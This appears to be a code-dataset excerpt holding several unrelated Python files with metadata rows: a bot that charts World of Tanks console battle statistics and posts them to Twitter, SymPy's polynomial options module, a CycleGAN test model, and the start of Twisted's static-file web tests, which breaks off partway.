cw_battles_xbox = OrderedDict()
cw_battles_ps = OrderedDict()
percent_cw_xbox = OrderedDict()
percent_cw_ps = OrderedDict()
for d in dates:
ww2_battles_xbox[d] = 0
ww2_battles_ps[d] = 0
cw_battles_xbox[d] = 0
cw_battles_ps[d] = 0
percent_cw_xbox[d] = None
percent_cw_ps[d] = None
for bucket in total_battles_response['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
ww2_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
ww2_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for bucket in cw_battles_response['aggregations']['2']['buckets']:
if not bucket['4']['buckets']:
continue
for subbucket in bucket['4']['buckets']:
if subbucket['key'] == 'xbox':
cw_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
cw_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for i in range(len(dates)):
percent_cw_xbox[dates[i]] = cw_battles_xbox[dates[i]] / ww2_battles_xbox[dates[i]]
percent_cw_ps[dates[i]] = cw_battles_ps[dates[i]] / ww2_battles_ps[dates[i]]
ww2_battles_xbox[dates[i]] = ww2_battles_xbox[dates[i]] - cw_battles_xbox[dates[i]]
ww2_battles_ps[dates[i]] = ww2_battles_ps[dates[i]] - cw_battles_ps[dates[i]]
return dates, list(ww2_battles_xbox.values()), list(ww2_battles_ps.values()), list(cw_battles_xbox.values()), list(cw_battles_ps.values()), list(percent_cw_xbox.values()), list(percent_cw_ps.values())
def create_mode_difference_graph(dates, ww2_battles_xbox, ww2_battles_ps, cw_battles_xbox, cw_battles_ps, percent_cw_xbox, percent_cw_ps, long_term=False, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Mode PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated breakdown of battles between CW and WW2, per platform' if not long_term else 'Estimated breakdown of battles between CW and WW2, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, ww2_battles_xbox, color='darkgreen', linewidth=2, label='WW2: Xbox')
ax1.plot(shifted_dates, cw_battles_xbox, color='lightgreen', linewidth=2, label='CW: Xbox')
ax1.plot(shifted_dates, ww2_battles_ps, color='darkblue', linewidth=2, label='WW2: Playstation')
ax1.plot(shifted_dates, cw_battles_ps, color='lightblue', linewidth=2, label='CW: Playstation')
ax1.set_ylim(bottom=0)
# for i in range(len(shifted_dates)):
# xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# xbox_text.set_rotation(90)
# ps_text.set_rotation(90)
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWN_PNG if not long_term else MODEBREAKDOWNLONG_PNG)
del fig
# Mode Percent PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated percentage of battles taking place in CW, per platform' if not long_term else 'Estimated percentage of battles taking place in CW, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
ax1.tick_params(axis='x', labelrotation=45)
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, percent_cw_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, percent_cw_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWNPERCENT_PNG if not long_term else MODEBREAKDOWNPERCENTLONG_PNG)
del fig
def upload_mode_breakdown_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(MODEBREAKDOWN_PNG)
percent = api.media_upload(MODEBREAKDOWNPERCENT_PNG)
api.update_status(
status="Estimated split between WW2 and CW battles",
media_ids=[battles.media_id, percent.media_id]
)
def get_universal_params(config):
params = dict()
watermark = config.get('watermark text', None)
if watermark:
params['watermark_text'] = watermark
return params
if __name__ == '__main__':
agp = ArgumentParser(
description='Bot for processing tracker data and uploading to Twitter')
agp.add_argument('config', help='Config file location')
agp.add_argument('-u', '--upload', help='Upload to twitter', action='store_true')
agp.add_argument('--activity-graphs', action='store_true')
agp.add_argument('--account-age', action='store_true')
agp.add_argument('--accounts-by-battles', action='store_true')
agp.add_argument('--five-battles-min', action='store_true')
agp.add_argument('--long-term', action='store_true')
agp.add_argument('--share-unique', action='store_true')
agp.add_argument('--top-cw-tanks', action='store_true')
agp.add_argument('--top-ww2-tanks', action='store_true')
agp.add_argument('--mode-breakdown', action='store_true')
args = agp.parse_args()
config = manage_config('read', args.config)
additional_params = get_universal_params(config)
now = datetime.utcnow()
if args.top_cw_tanks or args.top_ww2_tanks or args.mode_breakdown or args.long_term:
CW_TANKS = build_cw_tanks_list(config)
cw_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = CW_TANKS
ww2_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = 'NOT (' + CW_TANKS + ')'
if args.activity_graphs:
try:
create_activity_graphs(*query_es_for_graphs(config), **additional_params)
if args.upload:
upload_activity_graphs_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.account_age:
try:
create_account_age_chart(query_es_for_active_accounts(config), **additional_params)
if args.upload:
upload_account_age_graph_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.accounts_by_battles:
try:
create_accounts_by_battles_chart(query_es_for_accounts_by_battles(config), **additional_params)
if args.upload:
upload_accounts_by_battles_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.five_battles_min:
try:
create_five_battles_minimum_chart(query_five_battles_a_day_minimum(config), **additional_params)
if args.upload:
upload_five_battles_minimum_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
# Limit long-term views to beginning of month to review previous month's history
if args.long_term:
if now.day == 1:
try:
create_long_term_charts(*query_long_term_data(config, config.get('omit errors long term', True)), **additional_params)
create_mode_difference_graph(*query_es_for_mode_battles_difference(config, long_term=True), long_term=True, **additional_params)
if args.upload:
upload_long_term_charts(config)
upload_long_term_mode_charts(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.share_unique:
try:
share_unique_with_twitter(config, query_es_for_unique(config))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_cw_tanks:
try:
share_top_tanks(config, 'CW', query_for_tank_info(query_es_for_top_tanks(config, 'cw')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_ww2_tanks:
try:
share_top_tanks(config, 'WW2', query_for_tank_info(query_es_for_top_tanks(config, 'ww2')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.mode_breakdown:
try:
create_mode_difference_graph(*query_es_for_mode_battles_difference(config), **additional_params)
if args.upload:
upload_mode_breakdown_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
| bot.py | 62,245 | Multi-day, use gte Multi-day, use gte Setup queries Query Elasticsearch Filter numbers Players PNG ax1 = plt.axes() Battles PNG ax = plt.axes() New Players PNG ax = plt.axes() Averages PNG ax = plt.axes() Get all account IDs of active players Query account information to get age details Sum account ages based on range of age Outer pie chartlabels=outer_labels Inner pie chart Replace inner text with actual values Patch inner wedges to group together in explosion Influenced by: https://stackoverflow.com/a/20556088/1993468 Add subplot in second row, below nested pie chart Xbox, Playstation ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10) Outer pie chartlabels=outer_labels Inner pie chart Replace inner text with actual values Patch inner wedges to group together in explosion Influenced by: https://stackoverflow.com/a/20556088/1993468 Requested by Khorne Dog in the forums Setup queries 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped delkey = list(battles_buckets['all'].keys())[0] Players PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Battles PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Average PNG ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d') Setup query Query Elasticsearch Setup query Query Elasticsearch Filter numbers Mode PNG ax1 = plt.axes() for i in range(len(shifted_dates)): xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8) ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8) xbox_text.set_rotation(90) ps_text.set_rotation(90) Mode Percent PNG ax1 = plt.axes() print(e) print(e) print(e) print(e) Limit long-term views to beginning of month to review previous month's history print(e) print(e) print(e) print(e) print(e) | 1,918 | en | 0.567588 |
"""Options manager for :class:`Poly` and public API functions. """
from __future__ import print_function, division
__all__ = ["Options"]
from sympy.core import S, Basic, sympify
from sympy.core.compatibility import string_types, with_metaclass
from sympy.utilities import numbered_symbols, topological_sort, public
from sympy.utilities.iterables import has_dups
from sympy.polys.polyerrors import GeneratorsError, OptionError, FlagError
import sympy.polys
import re
class Option(object):
"""Base class for all kinds of options. """
option = None
is_Flag = False
requires = []
excludes = []
after = []
before = []
@classmethod
def default(cls):
return None
@classmethod
def preprocess(cls, option):
return None
@classmethod
def postprocess(cls, options):
pass
class Flag(Option):
"""Base class for all kinds of flags. """
is_Flag = True
class BooleanOption(Option):
"""An option that must have a boolean value or equivalent assigned. """
@classmethod
def preprocess(cls, value):
if value in [True, False]:
return bool(value)
else:
raise OptionError("'%s' must have a boolean value assigned, got %s" % (cls.option, value))
class OptionType(type):
"""Base type for all options that does registers options. """
def __init__(cls, *args, **kwargs):
@property
def getter(self):
try:
return self[cls.option]
except KeyError:
return cls.default()
setattr(Options, cls.option, getter)
Options.__options__[cls.option] = cls
@public
class Options(dict):
"""
Options manager for polynomial manipulation module.
Examples
========
>>> from sympy.polys.polyoptions import Options
>>> from sympy.polys.polyoptions import build_options
>>> from sympy.abc import x, y, z
>>> Options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
>>> build_options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
**Options**
* Expand --- boolean option
* Gens --- option
* Wrt --- option
* Sort --- option
* Order --- option
* Field --- boolean option
* Greedy --- boolean option
* Domain --- option
* Split --- boolean option
* Gaussian --- boolean option
* Extension --- option
* Modulus --- option
* Symmetric --- boolean option
* Strict --- boolean option
**Flags**
* Auto --- boolean flag
* Frac --- boolean flag
* Formal --- boolean flag
* Polys --- boolean flag
* Include --- boolean flag
* All --- boolean flag
* Gen --- flag
"""
__order__ = None
__options__ = {}
def __init__(self, gens, args, flags=None, strict=False):
dict.__init__(self)
if gens and args.get('gens', ()):
raise OptionError(
"both '*gens' and keyword argument 'gens' supplied")
elif gens:
args = dict(args)
args['gens'] = gens
defaults = args.pop('defaults', {})
def preprocess_options(args):
for option, value in args.items():
try:
cls = self.__options__[option]
except KeyError:
raise OptionError("'%s' is not a valid option" % option)
if issubclass(cls, Flag):
if flags is None or option not in flags:
if strict:
raise OptionError("'%s' flag is not allowed in this context" % option)
if value is not None:
self[option] = cls.preprocess(value)
preprocess_options(args)
for key, value in dict(defaults).items():
if key in self:
del defaults[key]
else:
for option in self.keys():
cls = self.__options__[option]
if key in cls.excludes:
del defaults[key]
break
preprocess_options(defaults)
for option in self.keys():
cls = self.__options__[option]
for require_option in cls.requires:
if self.get(require_option) is None:
raise OptionError("'%s' option is only allowed together with '%s'" % (option, require_option))
for exclude_option in cls.excludes:
if self.get(exclude_option) is not None:
raise OptionError("'%s' option is not allowed together with '%s'" % (option, exclude_option))
for option in self.__order__:
self.__options__[option].postprocess(self)
@classmethod
def _init_dependencies_order(cls):
"""Resolve the order of options' processing. """
if cls.__order__ is None:
vertices, edges = [], set([])
for name, option in cls.__options__.items():
vertices.append(name)
for _name in option.after:
edges.add((_name, name))
for _name in option.before:
edges.add((name, _name))
try:
cls.__order__ = topological_sort((vertices, list(edges)))
except ValueError:
raise RuntimeError(
"cycle detected in sympy.polys options framework")
def clone(self, updates={}):
"""Clone ``self`` and update specified options. """
obj = dict.__new__(self.__class__)
for option, value in self.items():
obj[option] = value
for option, value in updates.items():
obj[option] = value
return obj
def __setattr__(self, attr, value):
if attr in self.__options__:
self[attr] = value
else:
super(Options, self).__setattr__(attr, value)
@property
def args(self):
args = {}
for option, value in self.items():
if value is not None and option != 'gens':
cls = self.__options__[option]
if not issubclass(cls, Flag):
args[option] = value
return args
@property
def options(self):
options = {}
for option, cls in self.__options__.items():
if not issubclass(cls, Flag):
options[option] = getattr(self, option)
return options
@property
def flags(self):
flags = {}
for option, cls in self.__options__.items():
if issubclass(cls, Flag):
flags[option] = getattr(self, option)
return flags
class Expand(with_metaclass(OptionType, BooleanOption)):
"""``expand`` option to polynomial manipulation functions. """
option = 'expand'
requires = []
excludes = []
@classmethod
def default(cls):
return True
class Gens(with_metaclass(OptionType, Option)):
"""``gens`` option to polynomial manipulation functions. """
option = 'gens'
requires = []
excludes = []
@classmethod
def default(cls):
return ()
@classmethod
def preprocess(cls, gens):
if isinstance(gens, Basic):
gens = (gens,)
elif len(gens) == 1 and hasattr(gens[0], '__iter__'):
gens = gens[0]
if gens == (None,):
gens = ()
elif has_dups(gens):
raise GeneratorsError("duplicated generators: %s" % str(gens))
elif any(gen.is_commutative is False for gen in gens):
raise GeneratorsError("non-commutative generators: %s" % str(gens))
return tuple(gens)
class Wrt(with_metaclass(OptionType, Option)):
"""``wrt`` option to polynomial manipulation functions. """
option = 'wrt'
requires = []
excludes = []
_re_split = re.compile(r"\s*,\s*|\s+")
@classmethod
def preprocess(cls, wrt):
if isinstance(wrt, Basic):
return [str(wrt)]
elif isinstance(wrt, str):
wrt = wrt.strip()
if wrt.endswith(','):
raise OptionError('Bad input: missing parameter.')
if not wrt:
return []
return [ gen for gen in cls._re_split.split(wrt) ]
elif hasattr(wrt, '__getitem__'):
return list(map(str, wrt))
else:
raise OptionError("invalid argument for 'wrt' option")
class Sort(with_metaclass(OptionType, Option)):
"""``sort`` option to polynomial manipulation functions. """
option = 'sort'
requires = []
excludes = []
@classmethod
def default(cls):
return []
@classmethod
def preprocess(cls, sort):
if isinstance(sort, str):
return [ gen.strip() for gen in sort.split('>') ]
elif hasattr(sort, '__getitem__'):
return list(map(str, sort))
else:
raise OptionError("invalid argument for 'sort' option")
class Order(with_metaclass(OptionType, Option)):
"""``order`` option to polynomial manipulation functions. """
option = 'order'
requires = []
excludes = []
@classmethod
def default(cls):
return sympy.polys.orderings.lex
@classmethod
def preprocess(cls, order):
return sympy.polys.orderings.monomial_key(order)
class Field(with_metaclass(OptionType, BooleanOption)):
"""``field`` option to polynomial manipulation functions. """
option = 'field'
requires = []
excludes = ['domain', 'split', 'gaussian']
class Greedy(with_metaclass(OptionType, BooleanOption)):
"""``greedy`` option to polynomial manipulation functions. """
option = 'greedy'
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Composite(with_metaclass(OptionType, BooleanOption)):
"""``composite`` option to polynomial manipulation functions. """
option = 'composite'
@classmethod
def default(cls):
return None
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Domain(with_metaclass(OptionType, Option)):
"""``domain`` option to polynomial manipulation functions. """
option = 'domain'
requires = []
excludes = ['field', 'greedy', 'split', 'gaussian', 'extension']
after = ['gens']
_re_realfield = re.compile("^(R|RR)(_(\d+))?$")
_re_complexfield = re.compile("^(C|CC)(_(\d+))?$")
_re_finitefield = re.compile("^(FF|GF)\((\d+)\)$")
_re_polynomial = re.compile("^(Z|ZZ|Q|QQ)\[(.+)\]$")
_re_fraction = re.compile("^(Z|ZZ|Q|QQ)\((.+)\)$")
_re_algebraic = re.compile("^(Q|QQ)\<(.+)\>$")
@classmethod
def preprocess(cls, domain):
if isinstance(domain, sympy.polys.domains.Domain):
return domain
elif hasattr(domain, 'to_domain'):
return domain.to_domain()
elif isinstance(domain, string_types):
if domain in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ
if domain in ['Q', 'QQ']:
return sympy.polys.domains.QQ
if domain == 'EX':
return sympy.polys.domains.EX
r = cls._re_realfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.RR
else:
return sympy.polys.domains.RealField(int(prec))
r = cls._re_complexfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.CC
else:
return sympy.polys.domains.ComplexField(int(prec))
r = cls._re_finitefield.match(domain)
if r is not None:
return sympy.polys.domains.FF(int(r.groups()[1]))
r = cls._re_polynomial.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.poly_ring(*gens)
else:
return sympy.polys.domains.QQ.poly_ring(*gens)
r = cls._re_fraction.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.frac_field(*gens)
else:
return sympy.polys.domains.QQ.frac_field(*gens)
r = cls._re_algebraic.match(domain)
if r is not None:
gens = list(map(sympify, r.groups()[1].split(',')))
return sympy.polys.domains.QQ.algebraic_field(*gens)
raise OptionError('expected a valid domain specification, got %s' % domain)
@classmethod
def postprocess(cls, options):
if 'gens' in options and 'domain' in options and options['domain'].is_Composite and \
(set(options['domain'].symbols) & set(options['gens'])):
raise GeneratorsError(
"ground domain and generators interfere together")
elif ('gens' not in options or not options['gens']) and \
'domain' in options and options['domain'] == sympy.polys.domains.EX:
raise GeneratorsError("you have to provide generators because EX domain was requested")
class Split(with_metaclass(OptionType, BooleanOption)):
"""``split`` option to polynomial manipulation functions. """
option = 'split'
requires = []
excludes = ['field', 'greedy', 'domain', 'gaussian', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'split' in options:
raise NotImplementedError("'split' option is not implemented yet")
class Gaussian(with_metaclass(OptionType, BooleanOption)):
"""``gaussian`` option to polynomial manipulation functions. """
option = 'gaussian'
requires = []
excludes = ['field', 'greedy', 'domain', 'split', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'gaussian' in options and options['gaussian'] is True:
options['extension'] = set([S.ImaginaryUnit])
Extension.postprocess(options)
class Extension(with_metaclass(OptionType, Option)):
"""``extension`` option to polynomial manipulation functions. """
option = 'extension'
requires = []
excludes = ['greedy', 'domain', 'split', 'gaussian', 'modulus',
'symmetric']
@classmethod
def preprocess(cls, extension):
if extension == 1:
return bool(extension)
elif extension == 0:
raise OptionError("'False' is an invalid argument for 'extension'")
else:
if not hasattr(extension, '__iter__'):
extension = set([extension])
else:
if not extension:
extension = None
else:
extension = set(extension)
return extension
@classmethod
def postprocess(cls, options):
if 'extension' in options and options['extension'] is not True:
options['domain'] = sympy.polys.domains.QQ.algebraic_field(
*options['extension'])
class Modulus(with_metaclass(OptionType, Option)):
"""``modulus`` option to polynomial manipulation functions. """
option = 'modulus'
requires = []
excludes = ['greedy', 'split', 'domain', 'gaussian', 'extension']
@classmethod
def preprocess(cls, modulus):
modulus = sympify(modulus)
if modulus.is_Integer and modulus > 0:
return int(modulus)
else:
raise OptionError(
"'modulus' must a positive integer, got %s" % modulus)
@classmethod
def postprocess(cls, options):
if 'modulus' in options:
modulus = options['modulus']
symmetric = options.get('symmetric', True)
options['domain'] = sympy.polys.domains.FF(modulus, symmetric)
class Symmetric(with_metaclass(OptionType, BooleanOption)):
"""``symmetric`` option to polynomial manipulation functions. """
option = 'symmetric'
requires = ['modulus']
excludes = ['greedy', 'domain', 'split', 'gaussian', 'extension']
class Strict(with_metaclass(OptionType, BooleanOption)):
"""``strict`` option to polynomial manipulation functions. """
option = 'strict'
@classmethod
def default(cls):
return True
class Auto(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` flag to polynomial manipulation functions. """
option = 'auto'
after = ['field', 'domain', 'extension', 'gaussian']
@classmethod
def default(cls):
return True
@classmethod
def postprocess(cls, options):
if ('domain' in options or 'field' in options) and 'auto' not in options:
options['auto'] = False
class Frac(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` option to polynomial manipulation functions. """
option = 'frac'
@classmethod
def default(cls):
return False
class Formal(with_metaclass(OptionType, BooleanOption, Flag)):
"""``formal`` flag to polynomial manipulation functions. """
option = 'formal'
@classmethod
def default(cls):
return False
class Polys(with_metaclass(OptionType, BooleanOption, Flag)):
"""``polys`` flag to polynomial manipulation functions. """
option = 'polys'
class Include(with_metaclass(OptionType, BooleanOption, Flag)):
"""``include`` flag to polynomial manipulation functions. """
option = 'include'
@classmethod
def default(cls):
return False
class All(with_metaclass(OptionType, BooleanOption, Flag)):
"""``all`` flag to polynomial manipulation functions. """
option = 'all'
@classmethod
def default(cls):
return False
class Gen(with_metaclass(OptionType, Flag)):
"""``gen`` flag to polynomial manipulation functions. """
option = 'gen'
@classmethod
def default(cls):
return 0
@classmethod
def preprocess(cls, gen):
if isinstance(gen, (Basic, int)):
return gen
else:
raise OptionError("invalid argument for 'gen' option")
class Symbols(with_metaclass(OptionType, Flag)):
"""``symbols`` flag to polynomial manipulation functions. """
option = 'symbols'
@classmethod
def default(cls):
return numbered_symbols('s', start=1)
@classmethod
def preprocess(cls, symbols):
if hasattr(symbols, '__iter__'):
return iter(symbols)
else:
raise OptionError("expected an iterator or iterable container, got %s" % symbols)
class Method(with_metaclass(OptionType, Flag)):
"""``method`` flag to polynomial manipulation functions. """
option = 'method'
@classmethod
def preprocess(cls, method):
if isinstance(method, str):
return method.lower()
else:
raise OptionError("expected a string, got %s" % method)
def build_options(gens, args=None):
"""Construct options from keyword arguments or ... options. """
if args is None:
gens, args = (), gens
if len(args) != 1 or 'opt' not in args or gens:
return Options(gens, args)
else:
return args['opt']
def allowed_flags(args, flags):
"""
Allow specified flags to be used in the given context.
Examples
========
>>> from sympy.polys.polyoptions import allowed_flags
>>> from sympy.polys.domains import ZZ
>>> allowed_flags({'domain': ZZ}, [])
>>> allowed_flags({'domain': ZZ, 'frac': True}, [])
Traceback (most recent call last):
...
FlagError: 'frac' flag is not allowed in this context
>>> allowed_flags({'domain': ZZ, 'frac': True}, ['frac'])
"""
flags = set(flags)
for arg in args.keys():
try:
if Options.__options__[arg].is_Flag and not arg in flags:
raise FlagError(
"'%s' flag is not allowed in this context" % arg)
except KeyError:
raise OptionError("'%s' is not a valid option" % arg)
def set_defaults(options, **defaults):
"""Update options with default values. """
if 'defaults' not in options:
options = dict(options)
options['defaults'] = defaults
return options
Options._init_dependencies_order()
| PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/polys/polyoptions.py | 20,846 | ``all`` flag to polynomial manipulation functions.
``auto`` flag to polynomial manipulation functions.
An option that must have a boolean value or equivalent assigned.
``composite`` option to polynomial manipulation functions.
``domain`` option to polynomial manipulation functions.
``expand`` option to polynomial manipulation functions.
``extension`` option to polynomial manipulation functions.
``field`` option to polynomial manipulation functions.
Base class for all kinds of flags.
``formal`` flag to polynomial manipulation functions.
``auto`` option to polynomial manipulation functions.
``gaussian`` option to polynomial manipulation functions.
``gen`` flag to polynomial manipulation functions.
``gens`` option to polynomial manipulation functions.
``greedy`` option to polynomial manipulation functions.
``include`` flag to polynomial manipulation functions.
``method`` flag to polynomial manipulation functions.
``modulus`` option to polynomial manipulation functions.
Base class for all kinds of options.
Base type for all options that does registers options.
Options manager for polynomial manipulation module.
Examples
========
>>> from sympy.polys.polyoptions import Options
>>> from sympy.polys.polyoptions import build_options
>>> from sympy.abc import x, y, z
>>> Options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
>>> build_options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
**Options**
* Expand --- boolean option
* Gens --- option
* Wrt --- option
* Sort --- option
* Order --- option
* Field --- boolean option
* Greedy --- boolean option
* Domain --- option
* Split --- boolean option
* Gaussian --- boolean option
* Extension --- option
* Modulus --- option
* Symmetric --- boolean option
* Strict --- boolean option
**Flags**
* Auto --- boolean flag
* Frac --- boolean flag
* Formal --- boolean flag
* Polys --- boolean flag
* Include --- boolean flag
* All --- boolean flag
* Gen --- flag
``order`` option to polynomial manipulation functions.
``polys`` flag to polynomial manipulation functions.
``sort`` option to polynomial manipulation functions.
``split`` option to polynomial manipulation functions.
``strict`` option to polynomial manipulation functions.
``symbols`` flag to polynomial manipulation functions.
``symmetric`` option to polynomial manipulation functions.
``wrt`` option to polynomial manipulation functions.
Resolve the order of options' processing.
Allow specified flags to be used in the given context.
Examples
========
>>> from sympy.polys.polyoptions import allowed_flags
>>> from sympy.polys.domains import ZZ
>>> allowed_flags({'domain': ZZ}, [])
>>> allowed_flags({'domain': ZZ, 'frac': True}, [])
Traceback (most recent call last):
...
FlagError: 'frac' flag is not allowed in this context
>>> allowed_flags({'domain': ZZ, 'frac': True}, ['frac'])
Construct options from keyword arguments or ... options.
Clone ``self`` and update specified options.
Update options with default values.
Options manager for :class:`Poly` and public API functions. | 3,118 | en | 0.60998 |
from .base_model import BaseModel
from . import networks
from .cycle_gan_model import CycleGANModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = []
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = ['real_A', 'fake_B']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.norm, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def forward(self):
self.fake_B = self.netG(self.real_A)
| models/test_model.py | 1,726 | specify the training losses you want to print out. The program will call base_model.get_current_losses specify the images you want to save/display. The program will call base_model.get_current_visuals specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks assigns the model to self.netG_[suffix] so that it can be loaded please see BaseModel.load_networks we need to use single_dataset mode | 460 | en | 0.642989 |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import errno
import inspect
import mimetypes
import os
import re
import sys
import warnings
from io import BytesIO as StringIO
from unittest import skipIf
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import compat, log
from twisted.python.compat import networkString
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.requesthelper import DummyRequest
from twisted.web.test._util import _render
from twisted.web._responses import FOUND
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data(b"foo", "bar")
request = DummyRequest([''])
request.method = b'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data(b"foo", b"bar")
request = DummyRequest([b''])
request.method = b'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_ignoredExtTrue(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=1)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_ignoredExtFalse(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=0)
self.assertEqual(file.ignoredExts, [])
self.assertEqual(len(caughtWarnings), 1)
def test_allowExt(self):
"""
